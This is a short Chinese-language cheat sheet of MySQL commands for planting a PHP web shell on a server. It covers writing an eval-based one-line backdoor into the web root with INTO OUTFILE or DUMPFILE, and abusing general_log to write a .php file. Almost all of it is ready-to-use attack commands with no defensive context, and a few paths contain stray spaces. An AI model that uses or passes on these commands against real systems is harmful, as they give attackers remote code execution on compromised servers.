一、常规导入 shell 的操作创建数据表导出 shell
CREATE TABLE `mysql`.`shadow9` (`content` TEXT NOT NULL ); INSERT INTO `mysql`.`shadow9` (`content` ) VALUES (‘<?php @eval($_POST[pass]);?>’);
SELECT `content` FROM `shadow9` INTO OUTFILE ‘C:\\phpStudy\\WWW\\90sec.php’;
DROP TABLE IF EXISTS `shadow9`;
二、一句话导出shell:
select '<?php @eval($_POST[pass]);?>' into outfile 'c:/phpstu dy/www/90sec.php';
select '<?php @eval($_POST[pass]);?>' into outfile 'c:\\phpst udy\\www\\90sec.php';
select '<?php @eval($_POST[pass]);?>' into dumpfile 'c:\\phps tudy\\www\\bypass.php';
三、日志备份获取 shell
show global variables like "%genera%"; //查询general_ log配置
set global general_log='on'; //开启 general log 模 式
SET global general_log_file='D:/phpStudy/WWW/cmd.php'; //设置日志文件保存路径
SELECT '<?php phpinfo();?>'; //phpinfo()写入日志文件
set global general_log='off'; //关闭 general_log模 式
)
)
